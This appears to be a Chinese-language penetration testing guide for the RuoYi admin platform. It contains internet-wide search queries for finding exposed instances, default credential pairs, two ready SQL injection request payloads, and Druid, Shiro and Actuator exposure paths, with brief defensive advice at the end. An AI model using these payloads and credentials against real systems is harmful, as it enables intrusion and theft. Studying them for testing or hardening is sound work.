若依系统渗透测试指南<\/h1>

1. 若依系统简介<\/h2>

Ruoyi(若依)是一款基于Spring Boot和Vue.js开发的快速开发平台，提供后台管理系统所需的功能和组件，包括：<\/p>

权限管理<\/li>
定时任务<\/li>
代码生成<\/li>

日志管理<\/li> <\/ul>

常见版本：<\/p>

RuoYi（单应用版本）<\/li>
RuoYi-Vue（前后端分离版本）<\/li>
RuoYi-Cloud（微服务版本）<\/li>

RuoYi-App（移动版本）<\/li> <\/ul>

2. 信息收集与资产识别<\/h2>

2.1 特征识别<\/h3>

视觉特征<\/strong>：<\/p>

经典加载界面（绿色小草图标）<\/li>
登录页面显示"若依后台管理系统"<\/li> <\/ul>
技术特征<\/strong>：<\/p>

常见接口路径包含\/prod-api<\/code>、\/dev-api<\/code>等<\/li>
使用Druid、Swagger等组件<\/li> <\/ul> 2.2 资产收集方法<\/h3> FOFA搜索语法<\/strong>：<\/p> (icon_hash="-1231872293" || icon_hash="706913071") <\/code><\/pre> 鹰图搜索语法<\/strong>：<\/p> web.body="若依后台管理系统" <\/code><\/pre> 3. 常见漏洞利用方法<\/h2> 3.1 弱口令漏洞<\/h3> 常见凭证组合<\/strong>：<\/p> admin\/admin123<\/li> ry\/admin123<\/li> admin\/123456<\/li> admin\/admin888<\/li> <\/ul> Druid监控台默认凭证<\/strong>：<\/p> 用户名：admin<\/li> 密码：与后台相同或123456<\/li> <\/ul> 3.2 SQL注入漏洞<\/h3> 注入点1<\/strong>：\/system\/role\/list<\/code>接口的params[dataScope]<\/code>参数<\/p> POC：<\/p> POST<\/span> \/system\/role\/list HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> [target]<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 179<\/span> <\/span><\/span> <\/span><\/span>pageSize=&pageNum=&orderByColumn=&isAsc=&roleName=&roleKey=&status=&params[beginTime]=&params[endTime]=&params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e)) <\/span><\/span><\/code><\/pre>注入点2<\/strong>：\/system\/dept\/edit<\/code>接口的ancestors<\/code>参数（RuoYi v4.6版本）<\/p> POC：<\/p> POST<\/span> \/system\/dept\/edit HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> [target]<\/span> <\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span> <\/span><\/span>Content-Length:<\/span> 179<\/span> <\/span><\/span> <\/span><\/span>DeptName=1&deptid=100&ParentId=12&Status=0&ordernum=1&ancestors=0)or(extractvalue(1,concat((select user())) <\/span><\/span><\/code><\/pre>3.3 Druid监控台漏洞<\/h3> 常见访问路径<\/strong>：<\/p> \/druid\/index.html \/druid\/login.html \/prod-api\/druid\/login.html \/prod-api\/druid\/index.html \/dev-api\/druid\/login.html \/dev-api\/druid\/index.html \/api\/druid\/login.html \/api\/druid\/index.html \/admin\/druid\/login.html \/admin-api\/druid\/login.html <\/code><\/pre> 利用方法<\/strong>：<\/p> 尝试弱口令登录<\/li> 查看URL监控泄露的敏感接口<\/li> 利用Swagger插件进行信息泄露<\/li> <\/ol> 3.4 Shiro默认密钥漏洞<\/h3> 利用工具<\/strong>：<\/p> Liqunkit工具（可用于检测和利用Shiro默认密钥）<\/li> <\/ul> 检测方法<\/strong>：<\/p> 检查是否存在rememberMe<\/code>cookie<\/li> 使用工具测试默认密钥<\/li> <\/ol> 3.5 前端密码泄露漏洞<\/h3> 利用方法<\/strong>：<\/p> 查看页面源代码<\/li> 查找password相关字段<\/li> 修改或删除password参数可能直接显示密码<\/li> <\/ol> 3.6 Spring Boot Actuator漏洞<\/h3> 常见路径<\/strong>：<\/p> \/actuator \/actuator\/env \/actuator\/heapdump <\/code><\/pre> 利用方法<\/strong>：<\/p> 使用Spring Boot扫描工具检测<\/li> 访问泄露的接口获取敏感信息<\/li> 利用环境变量泄露获取凭证<\/li> <\/ol> 4. 渗透测试流程建议<\/h2> 信息收集<\/strong>：使用FOFA\/鹰图识别目标<\/li> 弱口令尝试<\/strong>：尝试常见凭证组合<\/li> 组件识别<\/strong>：检查Druid、Swagger等组件<\/li> 漏洞扫描<\/strong>：针对已知漏洞点进行测试<\/li> 权限提升<\/strong>：利用获取的信息尝试提升权限<\/li> 横向移动<\/strong>：在系统内部寻找更多漏洞点<\/li> <\/ol> 5. 防御建议<\/h2> 修改默认凭证和密钥<\/li> 及时更新系统和组件版本<\/li> 限制敏感接口的访问权限<\/li> 对用户输入进行严格过滤<\/li> 关闭不必要的调试接口<\/li> 实施最小权限原则<\/li> <\/ol> 6. 免责声明<\/h2> 本文档仅用于安全研究和防御目的。未经授权的渗透测试属于违法行为，使用者需自行承担相关法律责任。<\/p>